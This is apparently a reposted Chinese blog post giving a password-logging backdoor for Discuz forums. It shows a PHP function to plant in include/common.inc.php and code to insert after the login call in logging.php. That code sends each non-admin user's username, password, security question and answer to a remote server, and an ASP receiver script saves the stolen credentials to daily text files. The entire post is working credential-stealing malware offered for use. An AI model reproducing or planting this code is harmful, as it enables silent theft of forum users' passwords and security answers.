天天看點
傳回

dz記錄密碼(xxbing)

<a href="http://www.80pentest.com/?p=835">http://www.80pentest.com/?p=835</a>

DZ記錄密碼,我自己做了份代碼。

include/common.inc.php 裡面插一個自定義函數。

我選擇放在 41-53行。dz7.1-72 include/login.func.php (49-51行) | dz7.0 是在根目錄的logging.php

<a href="#viewSource">view source</a>

<code>01</code>

<code>function</code> <code>request_by_other(</code><code>$remote_server</code><code>,</code><code>$post_string</code><code>){</code>

<code>02</code>

<code>    </code><code>$context</code> <code>=</code><code>array</code><code>(</code>

<code>03</code>

<code>        </code><code>'http'</code><code>=&gt;</code><code>array</code><code>(</code>

<code>04</code>

<code>            </code><code>'method'</code><code>=&gt;</code><code>'POST'</code><code>,</code>

<code>05</code>

<code>            </code><code>'header'</code><code>=&gt;</code><code>'Content-type: application/x-www-form-urlencoded'</code><code>.</code><code>"/r/n"</code><code>.</code>

<code>06</code>

<code>                      </code><code>'User-Agent : xxbing/'s fuckyou!!!'</code><code>.</code><code>"/r/n"</code><code>.</code>

<code>07</code>

<code>                      </code><code>'Content-length: '</code><code>.</code><code>strlen</code><code>(</code><code>$post_string</code><code>)+8,</code>

<code>08</code>

<code>            </code><code>'content'</code><code>=&gt;</code><code>'mypost='</code><code>.</code><code>$post_string</code><code>)</code>

<code>09</code>

<code>        </code><code>);</code>

<code>10</code>

<code>    </code><code>$stream_context</code> <code>= stream_context_create(</code><code>$context</code><code>);</code>

<code>11</code>

<code>    </code><code>$data</code> <code>=</code><code>file_get_contents</code><code>(</code><code>$remote_server</code><code>,FALSE,</code><code>$stream_context</code><code>);</code>

<code>12</code>

<code>    </code><code>return</code> <code>$data</code><code>;</code>

<code>13</code>

<code>}</code>

找到根目錄下的 logging.php檔案。搜尋下面代碼。

<code>1</code>

<code>$ucresult</code> <code>= uc_user_login(</code><code>$username</code><code>,</code><code>$password</code><code>,</code><code>$loginfield</code> <code>==</code><code>'uid'</code><code>);</code>

然後在後面插上下面的代碼:

<code>if</code><code>(</code><code>$username</code><code>!=</code><code>'admin'</code><code>){</code>

<code>2</code>

<code>        </code><code>$showtime</code><code>=</code><code>gmdate</code><code>(</code><code>"Ynj H:i:s"</code><code>,time()+8*3600);</code>

<code>3</code>

<code>                </code><code>if</code><code>(</code><code>$answer</code><code>==</code><code>''</code><code>){</code>

<code>4</code>

<code>                </code><code>$answer</code><code>=</code><code>'無!'</code><code>;</code>

<code>5</code>

<code>                </code><code>}</code>

<code>6</code>

<code>        </code><code>//name1無用。但是必須加</code>

<code>7</code>

<code>        </code><code>$post_string</code> <code>=</code><code>'name1='</code><code>.</code><code>$name2</code><code>.</code><code>'&amp;name='</code><code>.</code><code>$username</code><code>.</code><code>'&amp;password='</code><code>.</code><code>$password</code><code>.</code><code>'&amp;questionid='</code><code>.</code><code>$questionid</code><code>.</code><code>'&amp;answer='</code><code>.</code><code>$answer</code><code>.</code><code>'&amp;showtime='</code><code>.</code><code>$showtime</code><code>.</code><code>'&amp;from='</code><code>.</code><code>$_SERVER</code><code>[</code><code>'SERVER_NAME'</code><code>];</code>

<code>8</code>

<code>9</code>

<code>                                                </code><code>}</code>

因為我熟悉asp,是以接受端我用asp寫的。

asp代碼如下:

<code>&lt;%</code>

<code>'接收檔案</code>

<code>'body0 = request.form(</code><code>"name1"</code><code>)</code>

<code>body1 = request.form(</code><code>"name"</code><code>)</code>

<code>body2 = request.form(</code><code>"password"</code><code>)</code>

<code>body3 = request.form(</code><code>"questionid"</code><code>)</code>

<code>body4 = request.form(</code><code>"answer"</code><code>)</code>

<code>body5 = request.form(</code><code>"showtime"</code><code>)</code>

<code>body7 = request.form(</code><code>"from"</code><code>)</code>

<code>body6 =</code><code>"賬号:"</code><code>&amp;body1 &amp;</code><code>"---密碼:"</code><code>&amp; body2 &amp;</code><code>"---問題ID:"</code><code>&amp; body3 &amp;</code><code>"---答案:"</code><code>&amp; body4 &amp;</code><code>"---時間:"</code><code>&amp; body5 &amp;</code><code>"---來源:"</code> <code>&amp; body7</code>

<code>'response.write body6</code>

<code>FileName =</code><code>date</code><code>()&amp;</code><code>".txt"</code>

<code>'這裡之是以要替換,是為了相容IIS7的環境。</code>

<code>14</code>

<code>FileName = Replace(FileName,</code><code>"/"</code><code>,</code><code>"-"</code><code>)</code>

<code>15</code>

<code>if</code> <code>body6 &lt;&gt;</code><code>""</code> <code>then</code>

<code>16</code>

<code>Call CreateFile(body6,FileName)</code>

<code>17</code>

<code>end</code> <code>if</code>

<code>18</code>

<code>Sub CreateFile(body,FileName)</code>

<code>19</code>

<code>Dim fso, tf ,cf</code>

<code>20</code>

<code>Set fso = CreateObject(</code><code>"Scripting.FileSystemObject"</code><code>)</code>

<code>21</code>

<code>Set tf = fso.openTextFile(server.mappath(FileName),8,True,0)</code>

<code>22</code>

<code>tf.WriteLine body</code>

<code>23</code>

<code>tf.WriteLine</code><code>"----------------"</code>

<code>24</code>

<code>tf.Close</code>

<code>25</code>

<code>set fso = nothing</code>

<code>26</code>

<code>End</code> <code>Sub</code>

<code>27</code>

<code>%&gt;</code>

.net php 資料安全/隐私保護 資料隐私保護 大資料隐私保護 大資料管理隐私保護 域名隐私保護備案 dba資訊收集腳本
上一篇: Windows中的LCS
下一篇: WORDPRESS背景拿SHELL的方法

繼續閱讀